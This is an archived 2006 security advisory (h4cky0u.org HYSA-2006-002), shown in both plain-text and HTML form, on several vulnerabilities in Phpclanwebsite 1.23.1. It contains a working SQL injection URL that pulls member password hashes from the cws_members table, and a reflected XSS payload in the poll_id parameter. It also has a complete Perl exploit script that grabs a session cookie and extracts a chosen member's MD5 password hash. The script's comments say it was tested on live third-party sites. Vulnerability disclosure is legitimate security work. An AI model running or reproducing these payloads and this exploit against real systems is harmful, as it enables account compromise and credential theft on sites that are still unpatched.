HYSA-2006-002.txt

2006-01-26T00:00:00
ID PACKETSTORM:43400
Type packetstorm
Reporter h4cky0u
Modified 2006-01-26T00:00:00

Description

                                        
                                            `------=_Part_30841_1212921.1138229099426  
Content-Type: text/plain; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
------------------------------------------------------  
HYSA-2006-002 h4cky0u.org Advisory 011  
------------------------------------------------------  
Date - Thu Jan 26 2006  
  
  
TITLE:  
=3D=3D=3D=3D=3D=3D  
  
Phpclanwebsite 1.23.1 Multiple Vulnerabilities  
  
  
SEVERITY:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
High  
  
  
SOFTWARE:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
Phpclanwebsite 1.23.1  
  
  
INFO:  
=3D=3D=3D=3D=3D  
  
Phpclanwebsite is a webpage content manager designed specifically for  
the online gaming community. For clans it not only provides a stunning  
impressive website, it allows you to manage your members and their  
details. The nature of clans means that members come and go and to  
ease the burden of keeping your website up to date, phpclanwebsite has  
an easy to use member panel that allows a clan admin to easily add,  
update or remove members from your list. This similtaneously updates  
multiple areas on your website that relies on this data (Member List,  
Member access to password protected areas, Members email and msn  
addresses from your distribution list)  
  
http://www.phpclanwebsite.com/  
  
  
DESCRIPTION:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
Phpclanwebsite 1.23.1 is vulnerable to multiple vulnerabilities, but  
the most dangerouse of all is a sql injection bug I found that can  
give a attacker the md5 hash of the administrator or some other user  
of the forum. Here is an example:  
  
http://127.0.0.1/phpclan/index.php?page=3Dforum&func=3Dpost&par=3D2%20UNION=  
%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_member=  
s%20WHERE%20member_id=3D3/*  
  
If you know how sql injection attacks work you can make more complex  
queries to the server. The second bug I found will give you a error  
and the path to uploader.php. All you need to do is log in with admin  
previlegues and go to index.php?page=3Duploader from then for a file  
specify something like "\" and you will get the error message(for me  
this is a file inclusion problem). And finally the last hole that I  
have found for now is again a sql injection one but also a XSS.Here is  
how it works:  
  
Go to index.php?page=3Dpolllist (you don't need to be logged in) then  
click on some of the pools, like "What do you think about this page"  
(if there are any) and then it will redirect you to something like  
index.php?page=3Dpollresults&poll_id=3D1 from then you type  
index.php?page=3Dpollresults&poll_id=3D'><script>alert('The Bug Hunter  
matrix_killer is back');</script> and you hit the "Enter" button on  
you keyboard.  
  
Then go to some other page of your menu like "Home" and a windows will  
pop-up with your text + you will see a sql syntax error[this bug may  
not work on some machines]  
  
  
PROOF OF CONCEPT CODE:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
#!perl  
#Phpclanwebsite 1.23.1 SQL injection exploit by matrix_killer  
#Greets to all omega-team members[and specially to EcLiPsE] and also  
to h4cky0u[h4cky0u.org], Alpha-Fan, Chameleon and all my friends  
#The exploit was tested on phpclan's website and it worked + my local  
server and on ra4ev.com  
#But on versions below 1.23.1 it doesn't seem to work  
  
use IO::Socket;  
$host =3D $ARGV[0];  
$path =3D $ARGV[1];  
$topic =3D $ARGV[2];  
$id =3D $ARGV[3];  
  
if (@ARGV < 4) {  
print "---------------------------------------------------------\n";  
print "-- Phpclanwebsite 1.23.1 SQL Injection sploit --\n";  
print "-- (C)oded by matrix_killer --\n";  
print "-- Contact: matrix_k\@abv.bg || matrix_killer\@ra4ev.com --\n";  
print "-- Usage: $0 [host] [path] [topic] [id] --\n";  
print "-- Ex: $0 127.0.0.1 cws 2 2 --\n";  
print "---------------------------------------------------------\n";  
exit();  
}  
$sock =3D IO::Socket::INET->new(PeerAddr =3D> "$host",PeerPort =3D>  
"80",Proto =3D> "tcp") || die "Can't establish a connection\n";  
  
print $sock "GET /$path/index.php?page=3Dforum&func=3Dpost&par=3D$topic HTT=  
P/1.1\n";  
print $sock "User-Agent: Mozilla/4.0\n";  
print $sock "Host: $host\n\n";  
while ($asd =3D <$sock>) {  
if ($asd =3D~ /Set-Cookie:/gi) {  
$asd =3D~ /cuser_id=3D([a-zA-Z0-9]{32})/;  
$cookie =3D $1;  
}  
}  
$sock->close;  
  
$socket =3D IO::Socket::INET->new(PeerAddr =3D> "$host",PeerPort =3D>  
"80",Proto =3D> "tcp") || die "Can't establish a connection\n";  
print "-- Connection Established --\n";  
  
print $socket "GET  
/$path/index.php?page=3Dforum&func=3Dpost&par=3D$topic%20UNION%20SELECT%20n=  
ull,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20m=  
ember_id=3D$id/*  
HTTP/1.0\n";  
print $socket "User-Agent: Mozilla/4.0\n";  
print $socket "Host: $host\n";  
print $socket "Cookie: cuser_id=3D$cookie; chitcounter=3Dhitcounter\n\n";  
print "-- Waiting... --\n";  
  
while($ans =3D <$socket>) {  
if ($ans =3D~ /([a-zA-Z0-9]{32})/){  
if ($ans =3D~ /cookie/i) {  
next;  
}  
print "\nmember id: $id \n";  
print "md5 hash: $1 \n";  
exit;  
}  
}  
print "Sorry there s33ms to be a problem\n";  
  
  
VENDOR STATUS  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
Vendor was contacted repeatedly but no response received till date.  
  
  
CREDITS:  
=3D=3D=3D=3D=3D=3D=3D=3D  
  
This vulnerability was discovered and researched by -  
  
matrix_killer of h4cky0u Security Forums.  
  
  
mail : matrix_k at abv dot bg  
  
web : http://www.h4cky0u.org  
  
Greets to all omega-team members + krassswr,EcLiPsE and all who support us =  
!!!  
  
  
ORIGINAL ADVISORY:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
http://www.h4cky0u.org/advisories/HYSA-2006-002-phpclan.txt  
  
--  
http://www.h4cky0u.org  
(In)Security at its best...  
  
------=_Part_30841_1212921.1138229099426  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
<pre>------------------------------------------------------<br> HYSA-2=  
006-002 <a href=3D"http://h4cky0u.org">h4cky0u.org</a> Advisory 011<br>----=  
--------------------------------------------------<br>Date - Thu Jan 26 200=  
6  
<br><br><br>TITLE:<br>=3D=3D=3D=3D=3D=3D<br><br>Phpclanwebsite 1.23.1 Multi=  
ple Vulnerabilities<br><br><br>SEVERITY:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>=  
<br>High<br><br><br>SOFTWARE:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>Phpclan=  
website 1.23.1<br><br><br>INFO:<br>=3D=3D=3D=3D=3D<br>  
<br>Phpclanwebsite is a webpage content manager designed specifically for t=  
he online gaming community. For clans it not only provides a stunning impre=  
ssive website, it allows you to manage your members and their details. The =  
nature of clans means that members come and go and to ease the burden of ke=  
eping your website up to date, phpclanwebsite has an easy to use member pan=  
el that allows a clan admin to easily add, update or remove members from yo=  
ur list. This similtaneously updates multiple areas on your website that re=  
lies on this data (Member List, Member access to password protected areas, =  
Members email and msn addresses from your distribution list)  
<br><br><a href=3D"http://www.phpclanwebsite.com/">http://www.phpclanwebsit=  
e.com/</a><br><br><br>DESCRIPTION:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<=  
br><br>Phpclanwebsite 1.23.1 is vulnerable to multiple vulnerabilities, but=  
the most dangerouse of all is a sql injection bug I found that can give a =  
attacker the md5 hash of the administrator or some other user of the forum.=  
Here is an example:  
<br><br><a href=3D"http://127.0.0.1/phpclan/index.php?page=3Dforum&func=  
=3Dpost&par=3D2%20UNION%20SELECT%20null,null,null,null,null,null,passwo=  
rd,null%20FROM%20cws_members%20WHERE%20member_id=3D3/*">http://127.0.0.1/ph=  
pclan/index.php?page=3Dforum&func=3Dpost&par=3D2%20UNION%20SELECT%2=  
0null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%2=  
0member_id=3D3/*  
</a><br><br>If you know how sql injection attacks work you can make more co=  
mplex queries to the server. The second bug I found will give you a error a=  
nd the path to uploader.php. All you need to do is log in with admin previl=  
egues and go to=20  
index.php?page=3Duploader from then for a file specify something like &quot=  
;\" and you will get the error message(for me this is a file inclusion=  
problem). And finally the last hole that I have found for now is again a s=  
ql injection one but also a=20  
XSS.Here is how it works:<br><br>Go to index.php?page=3Dpolllist (you don't=  
need to be logged in) then click on some of the pools, like "What do =  
you think about this page" (if there are any) and then it will redirec=  
t you to something like=20  
index.php?page=3Dpollresults&poll_id=3D1 from then you type index.php?p=  
age=3Dpollresults&poll_id=3D'><script>alert('The Bug Hunter ma=  
trix_killer is back');</script> and you hit the "Enter" but=  
ton on you keyboard.  
<br><br>Then go to some other page of your menu like "Home" and a=  
windows will pop-up with your text + you will see a sql syntax error[this =  
bug may not work on some machines]<br><br><br>PROOF OF CONCEPT CODE:<br>  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>#=  
!perl<br>#Phpclanwebsite 1.23.1 SQL injection exploit by matrix_killer<br>#=  
Greets to all omega-team members[and specially to EcLiPsE] and also to h4ck=  
y0u[<a href=3D"http://h4cky0u.org">h4cky0u.org  
</a>], Alpha-Fan, Chameleon and all my friends<br>#The exploit was tested o=  
n phpclan's website and it worked + my local server and on <a href=3D"http:=  
//ra4ev.com">ra4ev.com</a><br>#But on versions below 1.23.1 it doesn't seem=  
to work  
<br><br>use IO::Socket;<br>$host =3D $ARGV[0];<br>$path =3D $ARGV[1];<br>$t=  
opic =3D $ARGV[2];<br>$id =3D $ARGV[3];<br><br>if (@ARGV < 4) {<br> pri=  
nt "---------------------------------------------------------\n";=  
<br>  
print "-- Phpclanwebsite 1.23.1 SQL Injection sploit --\n";<br>=  
print "-- (C)oded by matrix_killer --\n";<br> print "-- C=  
ontact: <a href=3D"mailto:matrix_k\@abv.bg">matrix_k\@abv.bg</a> || <a href=  
=3D"mailto:matrix_killer\@ra4ev.com">  
matrix_killer\@ra4ev.com</a> --\n";<br> print "-- Usage: $0 [hos=  
t] [path] [topic] [id] --\n";<br> print "-- Ex: $0 <a href=3D"ht=  
tp://127.0.0.1">127.0.0.1</a> cws 2 2 --\n";<br> print "--------=  
-------------------------------------------------\n";  
<br> exit();<br>}<br>$sock =3D IO::Socket::INET->new(PeerAddr =3D> &=  
quot;$host",PeerPort =3D> "80",Proto =3D> "tcp&qu=  
ot;) || die "Can't establish a connection\n";<br><br>print $sock =  
"GET /$path/index.php?page=3Dforum&func=3Dpost&par=3D$topic HT=  
TP/1.1\n";  
<br>print $sock "User-Agent: Mozilla/4.0\n";<br>print $sock &quot=  
;Host: $host\n\n";<br>while ($asd =3D <$sock>) {<br> if (=  
$asd =3D~ /Set-Cookie:/gi) {<br> $asd =3D~ /cuser_id=3D([a-zA-Z=  
0-9]{32})/;  
<br> $cookie =3D $1;<br> }<br>}<br>$sock->close;<br><=  
br>$socket =3D IO::Socket::INET->new(PeerAddr =3D> "$host",=  
PeerPort =3D> "80",Proto =3D> "tcp") || die &quot=  
;Can't establish a connection\n";  
<br>print "-- Connection Established --\n";<br><br>print $socket =  
"GET /$path/index.php?page=3Dforum&func=3Dpost&par=3D$topic%20=  
UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_m=  
embers%20WHERE%20member_id=3D$id/* HTTP/1.0\n";  
<br>print $socket "User-Agent: Mozilla/4.0\n";<br>print $socket &=  
quot;Host: $host\n";<br>print $socket "Cookie: cuser_id=3D$cookie=  
; chitcounter=3Dhitcounter\n\n";<br>print "-- Waiting... --\n&quo=  
t;;  
<br><br>while($ans =3D <$socket>) {<br> if ($ans =3D~ /([a-zA-Z=  
0-9]{32})/){<br> if ($ans =3D~ /cookie/i) {<br> =  
next;<br> }<br> print "\nmember id: $id \n"=  
;<br>  
print "md5 hash: $1 \n";<br> exit;<br> =  
}<br>}<br>print "Sorry there s33ms to be a problem\n";<br><br>=  
<br>VENDOR STATUS<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>Vendor =  
was contacted repeatedly but no response received till date.  
<br><br><br>CREDITS:<br>=3D=3D=3D=3D=3D=3D=3D=3D<br><br>This vulnerability =  
was discovered and researched by -<br><br>matrix_killer of h4cky0u Security=  
Forums.<br><br><br>mail : matrix_k at abv dot bg<br><br>web : <a href=3D"h=  
ttp://www.h4cky0u.org">  
http://www.h4cky0u.org</a><br><br>Greets to all omega-team members + krasss=  
wr,EcLiPsE and all who support us !!!<br><br><br>ORIGINAL ADVISORY:<br>=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br><a href=3D"http:=  
//www.h4cky0u.org/advisories/HYSA-2006-002-phpclan.txt">  
http://www.h4cky0u.org/advisories/HYSA-2006-002-phpclan.txt</a><br></pre>  
-- <br><a href=3D"http://www.h4cky0u.org">http://www.h4cky0u.org</a><br>(In=  
)Security at its best...  
  
------=_Part_30841_1212921.1138229099426--  
`